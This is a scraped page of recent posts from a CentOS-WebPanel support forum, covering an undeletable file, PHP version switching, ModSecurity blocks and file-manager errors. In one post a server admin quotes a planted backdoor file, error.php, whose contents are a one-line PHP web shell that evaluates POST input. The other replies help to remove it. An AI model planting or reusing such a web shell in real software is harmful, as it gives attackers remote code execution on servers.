1
CentOS-WebPanel Bugs / Re: Cannot Delete File
« Last post by Starburst on Today at 04:18:03 AM »Ditto to what @overseer posted.
On our AL9 servers, there is no error.php in usr/local/cwpsrv/htdocs/admin/admin
1 other thing you can try is goto User Accounts -> Fix Permissions -> Select User (nobody), click on all 3 boxes, and then the blue bar 'Fix Selected Issues'
On our AL9 servers, there is no error.php in usr/local/cwpsrv/htdocs/admin/admin
1 other thing you can try is goto User Accounts -> Fix Permissions -> Select User (nobody), click on all 3 boxes, and then the blue bar 'Fix Selected Issues'
2
CentOS-WebPanel Bugs / Re: Cannot Delete File
« Last post by Bijan on July 17, 2025, 01:07:43 AM »That did not work. I have remove the I(mmutable) and e(xtent) flags. lsattr returns --------------.
3
CentOS-WebPanel Bugs / Re: Cannot Delete File
« Last post by overseer on July 17, 2025, 12:44:52 AM »Not present on any servers I manage (one CentOS 7.9 holdout, a couple of AlmaLinux 8 servers, a couple of AL9 test beds).
Try to see if the immutable bit is set, then remove:
Try to see if the immutable bit is set, then remove:
Code: [Select]
chattr -i error.php
rm -rf error.php
4
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by Bijan on July 17, 2025, 12:22:28 AM »I just saw I was affected by this issue. The php file was in each of my /home/ directories public_html folder. The modified date for the file was July 6 but my CWPpro version is currently 0.9.8.1207. Is there a way to find out exactly when this version was released?
5
CentOS-WebPanel Bugs / Cannot Delete File
« Last post by Bijan on July 17, 2025, 12:18:47 AM »On my server running CWP, I recently found a file located in `/usr/local/cwpsrv/htdocs/admin/admin` called `error.php` that just has the contents `<?php @eval($_POST['shell']);?>` (very concerning).
```
# file: error.php
# owner: root
# group: root
user::rwx
group::r-x
other::r-x
```
`/dev/mapper/centos_centos7-root on / type ext4 (rw,relatime,data=ordered)`
This file was obviously not included with the standard cwpsrv files. What else can I do to delete this file?
Code: [Select]
whoami
returns `root`.Code: [Select]
rm -rf error.php
returns “Permission denied.”Code: [Select]
lsattr error.php
returns `-------------e-- error.php`.Code: [Select]
getfacl error.php
returns:```
# file: error.php
# owner: root
# group: root
user::rwx
group::r-x
other::r-x
```
Code: [Select]
mount | grep "$(df error.php | tail -1 | awk '{print $1}')"
Returns:`/dev/mapper/centos_centos7-root on / type ext4 (rw,relatime,data=ordered)`
This file was obviously not included with the standard cwpsrv files. What else can I do to delete this file?
6
PHP Selector / Re: I can't Change my php version 8.1 to 8.2
« Last post by overseer on July 16, 2025, 03:24:06 PM »You just need to purchase CWP Pro (PayPal is best) and assign your license to your IP address to activate Pro.
7
Suggestions / Re: Simple editor to Master php.ini
« Last post by ylaya88 on July 16, 2025, 12:35:07 PM »yes, but that php.ini or user.ini is fot php options and no for php extensions.
so please review the request.
I like cwp panel a lot.
so please review the request.
I like cwp panel a lot.
8
PHP Selector / Re: I can't Change my php version 8.1 to 8.2
« Last post by it_harkat on July 16, 2025, 12:24:59 PM »9
PHP / Re: Difference in the php views...
« Last post by venty on July 16, 2025, 09:12:06 AM »The main php version from the CLI that you have set used by PHP Switcher is called for php info on your first case. The display is typical for a 7.x version -- CWP renders it using their stylesheet so it matches the rest of the panel. But if you have an 8.x or later, it will call the normal php.info and display it in that space.Hi,
Thank you very much for the answer, but I updated it to a higher version of PHP - 8.1.32, and the display is the same...
I found that when I select menu PHP Settings/PHP info in the error logs, I have the following entries:
[Wed Jul 16 09:24:02.156951 2025] [security2:error] [pid 57264:tid 57296] [client 80.100.247.29:57842] ModSecurity: Warning. Unconditional match in SecAction. [file "/usr/local/apache/modsecurity-rules/owasp-crs/coreruleset-4.15.0/rules/RESPONSE-980-CORRELATION.conf"] [line "98"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=8, detection=8, per_pl=8-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=5, HTTP=0, SESS=0, COMBINED_SCORE=8)"] [ver "OWASP_CRS/4.15.0"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "80.100.247.29"] [uri "/phpinfo.php"] [unique_id "aHdFgh8PEqQ3cHJu45Rg6gAAAIM"]
[Wed Jul 16 09:24:02.156739 2025] [security2:error] [pid 57264:tid 57296] [client 80.100.247.29:57842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/usr/local/apache/modsecurity-rules/owasp-crs/coreruleset-4.15.0/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "233"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score:

[Wed Jul 16 09:24:02.156378 2025] [security2:error] [pid 57264:tid 57296] [client 80.100.247.29:57842] ModSecurity: Warning. Matched phrase "phpinfo" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-rules/owasp-crs/coreruleset-4.15.0/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "339"] [id "933150"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: phpinfo found within REQUEST_FILENAME: /phpinfo.php"] [severity "CRITICAL"] [ver "OWASP_CRS/4.15.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-PHP"] [tag "capec/1000/152/242"] [hostname "80.100.247.29"] [uri "/phpinfo.php"] [unique_id "aHdFgh8PEqQ3cHJu45Rg6gAAAIM"]
[Wed Jul 16 09:24:02.155614 2025] [security2:error] [pid 57264:tid 57296] [client 80.100.247.29:57842] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/usr/local/apache/modsecurity-rules/owasp-crs/coreruleset-4.15.0/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "730"] [id "920350"] [msg "Host header is a numeric IP address"] [data "78.108.247.29"] [severity "WARNING"] [ver "OWASP_CRS/4.15.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [hostname "80.100.247.29"] [uri "/phpinfo.php"] [unique_id "aHdFgh8PEqQ3cHJu45Rg6gAAAIM"]
I added the IDs to global_disabled_rules.conf, but when I select menu PHP Settings/PHP info, the display is the same and the entries appear again...
What should I do?
BR
Venty
10
CentOS 9 Problems / Unable to download files from File Manager
« Last post by thisisbsk on July 15, 2025, 09:40:37 PM »The user panel file manager displays 'Access denied' when clicking on the download button of any file. However, the download icon is functioning properly from the admin panel file manager.
My CWP version is 0.9.8.1207 (pro) installed in CentOS Stream release 9.
The issue is present in fileManager_v2.php. But when I'm using fileManager2.php, the download option is working fine.
I tried changing the system PHP version, but it's happening for 7.1 to 8.1, all php versions. There is no error log also.
How can I debug the issue?
If we can't debug the issue, is there any way to change the link of the file manager in the user panel navigation?
My CWP version is 0.9.8.1207 (pro) installed in CentOS Stream release 9.
The issue is present in fileManager_v2.php. But when I'm using fileManager2.php, the download option is working fine.
I tried changing the system PHP version, but it's happening for 7.1 to 8.1, all php versions. There is no error log also.
How can I debug the issue?
If we can't debug the issue, is there any way to change the link of the file manager in the user panel navigation?